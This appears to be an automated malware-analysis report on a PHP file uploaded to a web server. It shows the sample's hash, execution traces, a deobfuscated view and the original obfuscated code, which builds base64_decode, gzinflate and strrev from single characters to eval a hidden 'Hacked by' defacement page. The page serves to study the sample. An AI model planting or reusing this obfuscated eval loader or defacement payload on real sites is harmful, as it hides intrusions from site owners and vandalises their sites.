PHP Malware Analysis


md5: 9401aabfc086ab86881fddc651688533

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Deobfuscated PHP code


$O = 's';
$jK = 'z';
$BNYHW = 'n';
$Vh = 'a';
$fZ = '_';
$AXcNG = 'b';
$LFCXt = 'd';
$wKmN = 'e';
$fHL = 'r';
$wE = 'g';
$rM = 'v';
$VKcu = 'c';
$A = 'i';
$nqd = 'o';
$Ysm = '6';
$fbB = 'l';
$pJ = '4';
$gM = 't';
$gkjAe = 'f';
$PsZRL = "base64_decode";
$sKeW = "gzinflate";
$wVuoW = "strrev";
eval("?><!DOCTYPE html>\r\n<html lang=\"en\">\r\n\r\n<head>\r\n    <meta charset=\"UTF-8\">\r\n    <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\r\n    <link rel=\"icon\" href=\"\">\r\n    <title>Hacked by Wedus_X12 Ft Zx-Rst1337</title>\r\n    <meta name=\"description\" content=\"#Daring Or Darling?\">\r\n    <meta http-equiv=\"cache-control\" content=\"index,cache\"> \r\n  <meta http-equiv=\"pragma\" content=\"index,cache\"> \r\n    <link href=\";display=swap\" rel=\"stylesheet\"> \r\n  <link href=\";display=swap\" rel=\"stylesheet\"> \r\n  <link href=\";display=swap\" rel=\"stylesheet\"> \r\n  <link href=\"\" rel=\"stylesheet\">\r\n  <link href=\"\" rel=\"stylesheet\">\r\n  <link href=\"\" rel=\"stylesheet\">\r\n  <link href=\";display=swap\" rel=\"stylesheet\"> \r\n  <link href=\";display=swap\" rel=\"stylesheet\">\r\n  <link href=\"|Montserrat|Cabin+Sketch|Iceberg|Architects+Daughter|Permanent+Marker|Luckiest+Guy|Cherry+Cream+Soda|Inconsolata|Iceland\" rel=\"stylesheet\" >\r\n  <link href=\"\" rel=\"stylesheet\">\r\n  <link href=\",700\" rel=\"stylesheet\" type=\"text/css\"> \r\n  <link href=\",700\" rel=\"stylesheet\" type=\"text/css\"> \r\n  <link href=\"|Gloria+Hallelujah|Indie+Flower|Permanent+Marker\" rel=\"stylesheet\"> \r\n  <link href=\"\" rel=\"stylesheet\"> \r\n  <link href=\"|Kaushan+Script|Press+Start+2P|Rationale\" rel=\"stylesheet\"> \r\n  <link href=\"\" rel=\"stylesheet\"> \r\n  <link href=\"\" rel=\"stylesheet\" type=\"text/css\"> \r\n  <link href=\"|Righteous\" rel=\"stylesheet\"> \r\n  <link href=\",700\" rel=\"stylesheet\" type=\"text/css\">  \r\n    <script src=\"\" type=\"text/javascript\"></script>\r\n    <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>    \r\n    <body style=\"background:black;\"><center><div class=\"four-zero-four-container\"><div class=\"code\"><div class=\"four-zero-four-container\"><div class=\"code\"><center><span style=\"font-size:38px; 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Execution traces

Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:35:28.615990]
1	0	1	0.000278	393512
1	3	0	0.000362	401960	{main}	1		/var/www/html/uploads/index.php	0	0
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1		A						/var/www/html/uploads/index.php	1	$Vh = 'a'
1		A						/var/www/html/uploads/index.php	1	$fZ = '_'
1		A						/var/www/html/uploads/index.php	1	$AXcNG = 'b'
1		A						/var/www/html/uploads/index.php	1	$LFCXt = 'd'
1		A						/var/www/html/uploads/index.php	1	$wKmN = 'e'
1		A						/var/www/html/uploads/index.php	1	$fHL = 'r'
1		A						/var/www/html/uploads/index.php	1	$wE = 'g'
1		A						/var/www/html/uploads/index.php	1	$rM = 'v'
1		A						/var/www/html/uploads/index.php	1	$VKcu = 'c'
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1		A						/var/www/html/uploads/index.php	1	$nqd = 'o'
1		A						/var/www/html/uploads/index.php	1	$Ysm = '6'
1		A						/var/www/html/uploads/index.php	1	$fbB = 'l'
1		A						/var/www/html/uploads/index.php	1	$pJ = '4'
1		A						/var/www/html/uploads/index.php	1	$gM = 't'
1		A						/var/www/html/uploads/index.php	1	$gkjAe = 'f'
1		A						/var/www/html/uploads/index.php	1	$PsZRL = 'base64_decode'
1		A						/var/www/html/uploads/index.php	1	$sKeW = 'gzinflate'
1		A						/var/www/html/uploads/index.php	1	$wVuoW = 'strrev'
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2	4	1	0.000630	406200
2	4	R			'\a�N�{�tYΊm���Py{TV_\034\v�\vI�Z��,=Rb�g\006�c�j7�~�p�5�X�K\005��H\024�ޒÖ�#\004�`�\032��y��\0025bZ�n���\a�֌��R9\022��\023\032V%�\0355��t�\022?�7\b�\025\030\033\v�&#N&B����uZ��8���\a\n�m��NM��-B\036�Sz�\016s��\035�̀ٱ�;���j�5\tob��_���J�:�\t�q/�M͕\tyE�՗�-�����-C�MU���=׬^�\030\\�q�i�և�\031��7G�Z�QRf�ڶ\nd�!�҉/�v�ԆC}I\n�4���U��n\001h\026�\024�5��RB��3���<d�\031\'MI�\003�~\rv����ݤ<��rԤ;�\027�\006\025hڐ���k\0376���)�k��\vb�U��6�/�x��4�z��ut!}��P|\v3���A1Zf\024���\002�VLY�-zt߄Σ:�_����i��'
2	5	0	0.000719	406168	strrev	0		/var/www/html/uploads/index.php	1	1	'\a�N�{�tYΊm���Py{TV_\034\v�\vI�Z��,=Rb�g\006�c�j7�~�p�5�X�K\005��H\024�ޒÖ�#\004�`�\032��y��\0025bZ�n���\a�֌��R9\022��\023\032V%�\0355��t�\022?�7\b�\025\030\033\v�&#N&B����uZ��8���\a\n�m��NM��-B\036�Sz�\016s��\035�̀ٱ�;���j�5\tob��_���J�:�\t�q/�M͕\tyE�՗�-�����-C�MU���=׬^�\030\\�q�i�և�\031��7G�Z�QRf�ڶ\nd�!�҉/�v�ԆC}I\n�4���U��n\001h\026�\024�5��RB��3���<d�\031\'MI�\003�~\rv����ݤ<��rԤ;�\027�\006\025hڐ���k\0376���)�k��\vb�U��6�/�x��4�z��ut!}��P|\v3���A1Zf\024���\002�VLY�-zt߄Σ:�_����i��'
2	5	1	0.000804	409272
2	5	R			'�Wkw�H\022��s�\037z���>\004\020�G��3\030�,l\023\f6\b����V#5�\036у�0�}�%����d2�|X\035Ԓ����oU�nޟ�����v7h@v���ݝ3�D\034�VE��\004=��b\023�\020\\g\016�0"6\016B\032U���F���l̎"?K?�lZ���}5[�\034\037G��TB�s#��D�C��\026}�ʙ;A\001�\025����쀎*��\025���q�sq�f԰�0�\021��[�1p��S3\016sc�zT\025����KL&�D�\002%\022C�PD�\b��l\'�\n���Y>\025���\016�H&\rI���\tG\036=�g\035\a̵��\000�\033�k����\t&6͊��Ƿ�0פ�ɨt�����\001�\034���6��@\t&�9��,N���\004&\022��#�0��4�x\022�k�&\v}�\027�p�})E>�\026��6��Ʒ�1��Q��$s�]��Z���8vp\'
2	6	0	0.000890	405144	gzinflate	0		/var/www/html/uploads/index.php	1	1	'�Wkw�H\022��s�\037z���>\004\020�G��3\030�,l\023\f6\b����V#5�\036у�0�}�%����d2�|X\035Ԓ����oU�nޟ�����v7h@v���ݝ3�D\034�VE��\004=��b\023�\020\\g\016�0"6\016B\032U���F���l̎"?K?�lZ���}5[�\034\037G��TB�s#��D�C��\026}�ʙ;A\001�\025����쀎*��\025���q�sq�f԰�0�\021��[�1p��S3\016sc�zT\025����KL&�D�\002%\022C�PD�\b��l\'�\n���Y>\025���\016�H&\rI���\tG\036=�g\035\a̵��\000�\033�k����\t&6͊��Ƿ�0פ�ɨt�����\001�\034���6��@\t&�9��,N���\004&\022��#�0��4�x\022�k�&\v}�\027�p�})E>�\026��6��Ʒ�1��Q��$s�]��Z���8vp\'
2	6	1	0.001013	413368
2	6	R			'?><!DOCTYPE html>\r\n<html lang="en">\r\n\r\n<head>\r\n    <meta charset="UTF-8">\r\n    <meta http-equiv="X-UA-Compatible" content="IE=edge">\r\n    <link rel="icon" href="">\r\n    <title>Hacked by Wedus_X12 Ft Zx-Rst1337</title>\r\n    <meta name="description" content="#Daring Or Darling?">\r\n    <meta http-equiv="cache-control" content="index,cache"> \r\n  <meta http-equiv="pragma" content="index,cache"> \r\n    <link href="'
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<pre>        ,     \    /      ,        
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 ____/_____\__\@  @/___/_____\____ 
|             |\../|              |
|              \VV/               |
|       Keep Calm and Santuy      |
 |    /\ /      \\       \ /\    | 
 |  /   V        ))       V   \  | 
 |/     `       //        '     \| 
 `              V                '
          <font face="Reggae" size="9" color="lime">Greetz :
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Original PHP code

<?php $O='s';$jK='z';$BNYHW='n';$Vh='a';$fZ='_';$AXcNG='b';$LFCXt='d';$wKmN='e';$fHL='r';$wE='g';$rM='v';$VKcu='c';$A='i';$nqd='o';$Ysm='6';$fbB='l';$pJ='4';$gM='t';$gkjAe='f';$PsZRL=$AXcNG.$Vh.$O.$wKmN.$Ysm.$pJ.$fZ.$LFCXt.$wKmN.$VKcu.$nqd.$LFCXt.$wKmN;$sKeW=$wE.$jK.$A.$BNYHW.$gkjAe.$fbB.$Vh.$gM.$wKmN;$wVuoW=$O.$gM.$fHL.$fHL.$wKmN.$rM;eval($sKeW($wVuoW($PsZRL('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'))));